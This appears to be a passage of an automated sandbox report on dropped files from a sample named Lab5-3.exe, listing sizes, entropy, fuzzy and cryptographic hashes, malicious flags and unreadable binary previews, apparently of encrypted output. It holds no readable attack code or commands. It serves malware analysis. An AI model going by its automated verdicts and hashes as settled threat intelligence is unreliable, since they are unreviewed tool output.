                                                                                                          Preview:U\...}..._..u.E..,.>........e.....#..C.i...%.YIy....WM.S.f..c.$..."...4K6 3..k...|L..P.A.......y...Uj3.....*..X..b..s.q....;....d.).H.....*|.B....Z.I~....G.uV.L..R....l...1....I....Ih>...L.....}1.z..^.SGoT#..h .1...l..4...8<..j..n. ....G.3.&}.ba..8.@........g-*aA...R....[. BP.....HE.8..m~...l...uc."}.w..W...@..].c..4....t..t|....))..A}...Z.\l|._H....J..*|V.C=..K..6.0.9.6.......=,.8...z....L2.[..|I ..=4.F-x*.`.....}.P.. ..N....DGi.e.....=.../.e.$..J||d..c-$.D....;Y%...".@...B....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.897959198923568
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:IgZRmjsHfUTid3hBaUoSGFcmeykEdEElU92i:pZsjrGx0uKeY2ElUJ
                                                                                                          MD5:749D0A1802A1BF671E606FC05021EA19
                                                                                                          SHA1:059732274C0EB6A6BBE37ACBB4153DBEA7580DE5
                                                                                                          SHA-256:7E10D4FB0589DF2E44595F18D412B0789402F08346B937E61F67C3F46D088E95
                                                                                                          SHA-512:08EA12C21EEA9F24AA8D14BF7419E132E67A2D7F87D6567D473287757BF25DBAA9B20472D0751CE842B34E3FE2D7C410F9AC22B5064796EDDC577E02DFE6E24A
                                                                                                          Malicious:false
                                                                                                          Preview:..i.....;.D..tfkP.FL.^^mV.>.0......f.m.S....b(..o.5.....PN.H.hD..O.85.'&..F.... ,ZE.0..ED....os..yS......I.G....$...H-..w$.). Yt...O(.r:.5J..4.......!8.....[..uA.X..*..N.,co.,....F...W.....R./.sA.4..O.o$W.^..T..Z...=U.I.m.EZ.m.`.*.f....il.[>..E.HR..WB%..."\....h...E...=.?.?.^.br.44w..bZ$...........].....e@.1....aV.._k.q..{(.hE.(._Ou.S._.}h....2.'....*g.>...C|H.U.Y..^".:...chX.W?.!...q@L-......pCBc.a/x..k....w".g.D...)q....(....#r..I.....l.Lm.:;.....D.&...b..r>..iwd.G.4"[/.%.4....b.v..KH.D..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4304
                                                                                                          Entropy (8bit):7.958871919732025
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:PKZ1/veoWDV682qP2SP0XmMgj2rU5Uu6fPAGx0uKeY2ElUJ:yjWD2S2Vmz2A5UuWPz0Cb
                                                                                                          MD5:5FA1B0A638F62FE1F3B6FD0BF40C3C8A
                                                                                                          SHA1:086512A2DDE04AEF505743C291BD22BBDA2C7A66
                                                                                                          SHA-256:D057FF4E4314938BD5953D47FCB22172124DDA5A5ADEB332218C4928024A8033
                                                                                                          SHA-512:923D2613DA498895951CF74A57D980EFCF3E6F3C662CD164AF1CABD941A9E43CB8B21DE380B19269847ACCB37FF86C74391097E76A9EB2668D7F083C4DDBB5F3
                                                                                                          Malicious:false
                                                                                                          Preview:)..=..........i.Dua.AA,FU...N7@..`.>uf.....&...+..V.......9..S!..l....ln.r..<....d....".....2....*o..x*..7..%V.F...Ek...14[L.[8yZ...j.;...7i.GO.:B...DhK.m.W..H)EA....D..PE&+.u*......<..*"......sy....N..M.....5.......v.E...l..&.X.47%.s.T.I....Y.c1...%.T"........:V.7.3^m....n.xoC.....peo.k......v`.....kVDRK.0.^.....M..7K..X.yq....s....W}..(.0.I..1....gT.q..}....}.\.<W....P \..X..X,.7t.Ts..a.b..^.F. c.C...+..K.[.O....e.,"...lol.O.A..C..tHo..~...D.e...{...;..f.Uox..J.d,....pk'.%..l.H...f....v=D.M.....6.v.z...?.zze.....4.'Vb...}.*..w.5..m...g...8..?z.Xu..1cV..d..P3U:$.kL.......z..!..F....NmL..C,..H8.T....C(*.3`f.s>z...%....'C......%...)...z~..y9B..K."...M6.!. 6r.b_...;7.]*....1.s.5...>.r`.~.Q].r.,.?Ia..?|i.......b.Wz%J.bV..l..AH.N...~.._\..\.h....t..1.|..}....>...kS%./.c.b.=.a.N.......BZ.+.8..W).....EU..l...%R0C..X....&b.lx..O(.....Z..Ve&.K.G.P{.V....&E....N..t.di...^{.>..g.d.A..(V....8d@/...H...h..IJ....oh.X.(...gV....M.tx...$.u.Zq...{.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.903877520768584
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:WtziVKgtla5rHfUTid3hBaUoSGFcmeykEdEElU92i:WtziKYrGx0uKeY2ElUJ
                                                                                                          MD5:C02CD66E9FA260434AD3861CE4BA38C1
                                                                                                          SHA1:53B3C872E28E859C9D6F4EF4EF897108CCCC82B6
                                                                                                          SHA-256:E72CE1ECEA44054A4BD9C3106CD051839A5B909F8A95017C6BAAA5BAA17FFC7F
                                                                                                          SHA-512:BDFBFF9DF39DB19DED024C96DCBD1FAA94C805CADF533DB693C63F733B88CCCC05B50F98F6F23D8E0470661F57F510D03EAAB43FAB7AA0467C75F338D9C3EDE1
                                                                                                          Malicious:false
                                                                                                          Preview:4`..yp.....-.^...c.JUD...c.S..j........(c"&P...J.qc...IP.....2.*:=X.."...T.z......j+..Z..@.L=.{.?.>.._.u....`K.s...m.a....lw5...E......V/P.e.f.f1....*..z..L....^.."....r...n.TD.X.fY.... ...q."..O.iZ0D>.S....0..0...Y?6|.#.. .x....w....2Y..j.(<(..]..Td-KU....#IL.wN:C.....[..C.......{....FRL..&...Z.*$..1.).}...|H]#.Z.'._....+.....g..2.wvS.]!..S^..........K)......{f2.l.R.J.*A...B6;..._&...I...k.|.9.p^..f8`*8!..x.".P.........v...u.[E.x.}...x.+(...z.u..F...F........c..w..v....`...,.o..(..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):24672
                                                                                                          Entropy (8bit):7.992517342542958
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:3TSK4dt82QT84CyrVa1ZyZG9HZ5xMarh89rXsH7E/Mqvs7Fu5rrACSd41Eyetb:3Td4T5QrIfeIHZxhgT4F0lSCLeZ
                                                                                                          MD5:9E3B1DA4EECFE571EB91C1020BDD4838
                                                                                                          SHA1:AFA075074166B7219149C7CD95E392A4287597D5
                                                                                                          SHA-256:31FB1881F5980C61ED4232CF008655F235DA5A01929A64AA65BC8166FE8E21FE
                                                                                                          SHA-512:EA961EAC99B03D042A3A9FD4C269A1B2F7385B2629FB74D6B579964A2E74B87E0350E2B6C3382CCA1658DD00FE94412E9D53FFA4B3786EA69DFD45EFE5C64530
                                                                                                          Malicious:true
                                                                                                          Preview:...GaA..4...L...SaH.J........b.5>.|>.]2.tx..B.i...Mz.3.6o.2Ts.n2.....W....<.u....2t....:J...e._AWs...."r./....^g .+)j.E..x.HH.+.M.u. ..3$V.9.....hF...o..@..>>^a.i....2...Q.7..gQ._..*.(.{.q.lY.......T..^.7.{........pc...8....s...h.i..*x....E..@..i$26$&Au?nsg.\1q....?7...Na.T...........X...Y.ofOE........].......z...~(.....A6.4..Lg*.Z...1.0...r..D..[..s>B..{........G.....N....F.g.`i.F...R.5/]s.O...T.mo...9+....: ....Q:..!f.S./...3he..d.a.fzf.+....5.7x#..Q..@K...M..y.N.M6H."K...Z.(3^.e1...._S..D.Y4]..x.T.......8..zo.8..B*......gt/.........|.4R.L-5i.fH.T....?S...+..8..h..w......]..&...F..ab}.b...8.,.....Z...9.Pq9#.B..~X.E.8...m.4@.<...n.h..BW{.....e.GXR.u.Y.Q..../...S..x.Q..H.F...-.\...3........ .:.M......?.BE:Tl.~w..$.MXyi..Z.4.....r..>.t]...-...n.iz.7..r...j.CA..L.\.G..B..fo.~VG..."6OIp.1B.d....+..........l?2UE5tkx........"'...Z...P=...$.D.....|..g..c...gO....du^9.........-...P@..g8...|n|l..4.....x.g.#xg.0.VZk,..U.L.y... }..}~.e..W...p
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.900775641098351
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ze9BTvXSS5HfUTid3hBaUoSGFcmeykEdEElU92i:iBjXSS6Gx0uKeY2ElUJ
                                                                                                          MD5:0BA77CBBBDE20CBDA55015E14F4EB496
                                                                                                          SHA1:3F546ED91DEF58A0F0AACEDF27649EC04E4CE5BB
                                                                                                          SHA-256:74066088E0CFB83CDCC7E707E1961B28032633E9CF72F21FCD282E466D9E7266
                                                                                                          SHA-512:E120ED9B2FECDDF915260EC7C4B51CBB837BC92514B95E7984DFF7CADB46A3FD8FD4C59C98E75B186165EDA0D29A64ADED7164CFFD1351C13FF4C03A0D5D65CB
                                                                                                          Malicious:false
                                                                                                          Preview:.*....pU1....-..K..F48.y...........2z...}.D|%Q..u.../....g.~.F.<l..#M..........C.0E{....".....Pk{.......V......6...af.F..#.x.#......P#.2....3....&..n^i^.$.......%/.w9.I.4..+....r.J.......Q........c...>.'....Q.X.C.O.....xF;4...BC.....w>...0U.hh.^Q..u...z...b.:.x...3e..X....Q[.e..rb@Gz)..l$ ...%p...h| h.w4.<...Q^...e....J..N..s......_.!.An...z.m..Sy...97..#....................T~..l<"z...$...4s.....]b.m[.n.V&.....a..jx.wI....S.'e.C.jV..x...o.......HCx....i....=.]l..=0.H...Jg.J.gd..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.902702133535942
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9WutyPvU/pHfUTid3hBaUoSGFcmeykEdEElU92i:9WT3eqGx0uKeY2ElUJ
                                                                                                          MD5:EE13AB9050925F7B3ADC76536D3D862B
                                                                                                          SHA1:1B37721F4EC633071B1621649971258ADC7E1BF9
                                                                                                          SHA-256:5C3A051FD0B75D88ED74172B2C7938A90D4A85496513744FE230E9D54F84B542
                                                                                                          SHA-512:32782A2BD172C1FE4F42F6A2A541CEB76C93BC7E1AA48964BDCE0E68EE20C1B0D502B86D1BFEE1A4A4AC66B9E77C6701465CD772B48209DA18732F1F87F4C447
                                                                                                          Malicious:false
                                                                                                          Preview:'y.....!B5.c.....i...L...{..*.`e.."...4"....^t9...-...$.... .].........=..UXA7.r.,.}.n.j....ngT..i.~...@c..L'8.n7..$?..i.\........,.....!.'.3 ...6..{.>....{.I.z.N.BPu#...;./..{#.s.+. .Q.2.....Z./.;.5.v....P.o.`..X...*....!'...Z.q..Ch..h..5$+.Ka.:...K..........I.VJ...>.L.o-....;$......e.@a..T6..Y!.L...v5.......3...wH..N..(........ZQ[..Q.J``....@i.a)2..2R..Q......6..J!...A...\.....C..4w.X..{..`(.nPC./..E...C..zR..S#a...v.\...(#..d...)...t..f..3-...}.\W..ic.'x.2.....Y.T.....oO^..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.896170743746645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ldijygOHfUTid3hBaUoSGFcmeykEdEElU92i:lgjHGx0uKeY2ElUJ
                                                                                                          MD5:F5133D4CCAE89F201FA16B440AC91C37
                                                                                                          SHA1:CB688C8FFC5A7FA15B940C85C26AE3A36039AB30
                                                                                                          SHA-256:9BD5A5B310A8D713A30D94C8AB1D06650581BA9F859A8B385A23624C74FE26F8
                                                                                                          SHA-512:929DDB9700C7A0345C0930E28707E269C6724E1D0D3E27C44100712A78B7D132B4B1556A2A1F3D57F16A4948DD98A249A6864DB2D9840CC004CEE2B9A9A39FBC
                                                                                                          Malicious:false
                                                                                                          Preview:...yv5..+<.9@.e.R`0#......i}t(."X....j....@CtL../.c.I.>|+.g..w;".. $..x.....y)..0?..........f...g..?#.x........Md../aF.....1.im.b.9.i...r..J..s..._....{..^.....)..o.....5.2.,.....#%...Z_.Y.G....u.7H.^...l..6.B..i91.......m.V..7p.N.V.D.O.D.....HV..EQ.......A...~.[.R{.. ..0.?9[zT......[..D........LI.>.b.....*kTt3....Qo6B.....M.7..+.Hw..YF.y../.))..?...U>....oh.n.s.h..0z{.-....w..../j\.V..m..B.9.w..^....#..!.g..\..u.;"..~.s..L%."....<N0M..k...<..gb..+?.....|.6......(l....w....n..t.>....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.899228255889155
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:BH05fDZ7m8dHfUTid3hBaUoSGFcmeykEdEElU92i:Ba7WGx0uKeY2ElUJ
                                                                                                          MD5:8AC11EE4639092F9ECB16ADEF485A597
                                                                                                          SHA1:3E1CA85DF930800988DB29A26E11AF785765007F
                                                                                                          SHA-256:DE05B438437506B5CCCB6ADAFD4D11E73A160196A58A147A1B67B688EDAFA7D4
                                                                                                          SHA-512:1F84D021C402B3CB3A5F146D5C2667661241A7FA49BE541B137974A6CA4491772C507B41319962FE2882DADF16C74E50BFD8E6131BC4510197197DB6EAE630ED
                                                                                                          Malicious:false
                                                                                                          Preview:5..b2..k...\.{.].g..r......,...s.a.(-e....kz.>.. 8.{.5..n..c. .,. T.(..}...3(Z3...b.G....R)...a...Y;..5al[...p..C.T......K.5~}......[A.....Y ...q<.....C3..........FB..=.........W.(..#.....N..n....\uv...{(x_...@.....p.|.^....._Q!y...q.X...uI.a.D[..].pv..f.^2.9./.b.i\.mX<....Xx9#...{{..B!.c........A.(..._a.1=q.)..T.Xa....~.W...M..R..A.Z...N..I.A,JM.H.P3S..t.A...\.......B.......J..v....>..&.p..skS)7Q....q9...+.....#..$..j.....?v....Z..^.Ig...yJ.p.Z.VTR..3..R...\..$..z...M.e2.+.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.889486083005954
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:N2ffRloTdNEMkHfUTid3hBaUoSGFcmeykEdEElU92i:NwfD0wwGx0uKeY2ElUJ
                                                                                                          MD5:8AE3A8234EE397DEDBE4A3BA3290A719
                                                                                                          SHA1:C04E003B496167169F9A9330F4BB7BFA2B429794
                                                                                                          SHA-256:25D1F5FE62B2F2306F41984E6534F137465CFFC4835D417C1EBB8E2027164345
                                                                                                          SHA-512:8525020F92DC8907C69CD1B269876FD1DC196E973903483D015AFBB0D4ED8DE683E17FECFF535628E7150879423974D3332B8F5CBE02FE7A4C727834E6827131
                                                                                                          Malicious:false
                                                                                                          Preview:.np...%..$......X..c....t..F+}..C.|...$.4.6......?|..#..'.E..`..H....f!+.a..#{.uy...^...B.g>./s`$...B...B..L.. -.1...A.........4..).'..zO./1'..+C.....G.&. .b.-....z.\{u..pu..Y...4C.....v..T..TmsE._..~0.6[...B..a9..D3j.aN........v..7..[.ns]J..h..........L.=].A;..L...nGnS..+.8.....%..u..9..T.X...........5..Q..A%%P#..9.0.Ty.5....nE.Y.....".(fV.U. .e.P.C..Z0.....l@.[....:.(..e9.$-...".....o...B......6 .F..x...:..3...X.".:.....n....|'.X..%..i+.a.......1<..l..gDQLi_..,..9.0A..i.F....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2352
                                                                                                          Entropy (8bit):7.921953365167121
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:OMLyzhLn1Ka/5bFc6Hqyx/1HfUTid3hBaUoSGFcmeykEdEElU92i:EJ5q6HqhGx0uKeY2ElUJ
                                                                                                          MD5:D9EE487A43F3768E6A3F4A0FB009E60D
                                                                                                          SHA1:FF6CFE93D9A6975AB1948916BD75F27CE1159161
                                                                                                          SHA-256:0AD88263CA9D435C541D9DCC9BB15517252748E304358CB94740C04C3DF40F6F
                                                                                                          SHA-512:3A7D079069DFC096C485A1A7F1D61D70F7C97C095648B787A95EA208528A7ABF40B7577F2074488C424C5C59712E7C0CB217E432B67A6B658D7CAE1E19565816
                                                                                                          Malicious:false
                                                                                                          Preview:..b.R..N-..n?.U..p.n.v.>68.. .8J..ua...........&_V...k....Lv!.z..d.f.5.T.Z..y..........tW.*.,b....y.w$..S_.s...@.u.......%......t..S\..i.K.L.'*.n>.......2.T.L.Y.-5..L.......0..O..w;...r. 9.w@-E...C........N......$.z..Y_!....l/....w...<..*....?.....U..r{(v...e....do...Y.q!;.r...X.J>S...]|.A.}u.W.V.../..y...QCo..PB.4.C.G.......%........6U6S`|.......]. .,.|FF..t.>?Z..=sU..qF.....S..YM..o.o.P.. ......=I..x.!=..B.a....9..G....w.E....G...5....-.....od\..:tE.|.%....?q..2C>a.C....W..b.u.3..... ..,.....-..$.@...+..pB.....|D..T..t....g.K8..P.|.......+....q.}9.@..."[...p?...O.V.r.,.[.=...a......u.S.2k..0-.s20.|.:A.=6.....W.....e.............@re..Y...r..I.;..&h``.v....n....].+I...Kc.B".@...t9bD.Y.$LI.zo....|.R.q.W.#....#..6.j.|...y.d.....gJJ....;......,1'1@.I.A3..7..P......l .VN..UF.4../rNDj..\..v....AJ.$...G.K....v7v.".-S....)..;5"cH..a..<...uh..u.b.J....X3.H"'..,fV.I.6.s....+^.Z...q.ZZ..JF.Z...../....?.(..I...by...^V.SV..]]PX5..qnTU?t-l.>#7.....+eU.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.899486606985912
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:w2AMnJBAp5b8HfUTid3hBaUoSGFcmeykEdEElU92i:XncTGx0uKeY2ElUJ
                                                                                                          MD5:8D82BAC156096AA09DB98C8978FEE2CC
                                                                                                          SHA1:DEE9C5BB97DD36ECF7171D8FD1A817C2939E6FC1
                                                                                                          SHA-256:0518BEF2905C726A2CF9E74D6895AA63FFD209D71A51D8D814445DAC1AEF479F
                                                                                                          SHA-512:2F7ECB1F6FDD649D0B898571D2922F91C1E8A76362E30E84CFDF260A50CC2168FBB97AF17C9E788402454ED4B799131D8C741AF4891AFDD80049C392B0E280EF
                                                                                                          Malicious:false
                                                                                                          Preview:1..p,./.>....-.a&0.{E...k....p..O*..~.#X\.[A*.t.z.;..A.4[.!....dUc'.......gk...).}h.aB@Q@.n..p8....I.}.T.D6..3.).l..e!mn^....4..U..ne...2..k....E.S^*.6..K..%........d..aQ...O=.$..s...^F..~..T...H...T |{T...1..V.p.pf....;.F.v......&.~[.......%..p!.G*....N.Mlb...)..'.i.hc...#=.-g((.p......nO..&.o.m%..%?..jwNaR.,........W.......$.......... ...?.....Go...5.l6..>/..Q@....Y..r.......a5...|...0.....Z^e.....$.....MTC...>...H7pB.I8mUUw.E.[i.o.+.a*.S.&xd.....M.$.rC.Id....F...,..'$.b.9..m.c].{.).?..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):211152
                                                                                                          Entropy (8bit):7.999017405339791
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:ljNx6fmesApoUgRhGzYSX0VOiUoFhvsiB19wjPNKhojZecO00tkZhTLnrRiwbdaT:94uEo1RozY00VCoFL19qNbTQtUvxQlZ
                                                                                                          MD5:7012BC27A5405E494F2908D9E9B6D8C1
                                                                                                          SHA1:C75EFAE1DE656F5898A96C0ABF1CA81B7DCFDF7C
                                                                                                          SHA-256:19EF374A5B2CC90EA48B2EBCA0A97BD837DC97DB292574A8D8A39647465AD758
                                                                                                          SHA-512:1FCF09979D1BC2F70592D6B5231A09570F609632BBB7F2A54B62A719C705F5944021890B25DAF80EC7555A01F9789F6183C56623B702F1FB7BEE44FE3D43DEC2
                                                                                                          Malicious:true
                                                                                                          Preview:..Fu.Q~..b._..1.l!.48"....)......x..w....p!p.?.;......e.N.7...|....i4x...b.#..v.\......o.R$&`....r{.w.....).-f...D...CM..(v.Naj..5.. ...5.E,.o1.....g.....B/7...|...J}.'....LP..{.ja....;..R..I.4....<......M......<S....#k<..A...}r.. B...k.z...?....pl.$. .`.V...p..r|~(3..A....c5\&.pmTi"...[.y.."4..S0..K.|....J.......;y...^.C...ETW>.U":....3.....1...5.u..#..Z...kp....&T7.yM...M.x.X..=...<0..XPI._.....F.xB.;2....e.v.Wf.th@..........Qx......`3.JX&.;G..#...D......_..F......zv.-#v<.|T.+....l..&k.E.(e............=...]..:..t.E.....].r...i.N.2woY..4......,....s....o+..d....q#...X..t.?.G...@.tv.u_......F...S...M....v.c..C.1.?.Mw.G.h..&.A....h..q.1^......$....z.D..9~...........d.....J..F...gP|...O.........r..P]@q.t.Q..;<R..|.j']8........t..l..g&.Jmj.....g...}..4Z.Rp./...~..UKm..1......mn......\.?....Y......*..N.A.]....G.(....u...)....{(`.G...^..K?u.Kc.,g...J.W...+...s..dL...{w."......?..5.f".3...'..jA....D.t ....h...l.'$......;&.QX6.....X.'ej\.T..2!.e
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.892558949493867
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:AmG5N1NRWHfUTid3hBaUoSGFcmeykEdEElU92i:AmG5zNRpGx0uKeY2ElUJ
                                                                                                          MD5:D9A4C5674540EA9D4703AD2BF5A8F4BF
                                                                                                          SHA1:BCCEAFF4E59B64C1F7475D5AC31C4ACEF11C41E7
                                                                                                          SHA-256:9B3EAFE8E5C49178A500ED6DA56FB84EEC38D4A1047B0B4D4B4A77980F7190CA
                                                                                                          SHA-512:66CC07F25B08631FC781B5F4B23820AFB50C824D48D7CEF5F2F16FFB98A7FA546780397CECA231095E4D8CD9E3D138CA77AA2EF6C9A59DBAC663084BB837AEF4
                                                                                                          Malicious:false
                                                                                                          Preview:@3.c.'...KL..j.W........|.KQ..F..L........E.....1|lG..."..........r&.m.>.1b../..1#J..Jb....,9.........L...e^.1r...!...BK..,.....!..(v.B.C>$....'..$.LK..%r5....D5S.@..*...k.D...-QL.KWG,..y..t..8..4..N}E..8....n....S..A..&45..p:.Z=.._*..x.6....B...5...E...x..[(9.Z.'.....c....b..E.)T.=...m0...{ux.gC..<.X58C+........@.Z'.k.Gz.X.......8.d.V.=awg.y...}...I..:3b.......EPr......PkD....a.U.'..tf.,.6.a*A...2e(.B..8..<.s....YK.".2.f.N.......@..9...././......0.]...A..H....$p...M*..7wW..D?Z..!G..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2352
                                                                                                          Entropy (8bit):7.92012250461547
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5n6zP3ukQvlSVKRROfNE8YKHfUTid3hBaUoSGFcmeykEdEElU92i:8m7lmKRR6aGx0uKeY2ElUJ
                                                                                                          MD5:DE2E0ACE3166B8677448466F5EF1451A
                                                                                                          SHA1:E82555FAF5D7F754ABFBD635472F8D9C4496328C
                                                                                                          SHA-256:AAC701D6A900E58FC2C54AD6859B76E165297D4BD60FEC6094867E3237AA4F03
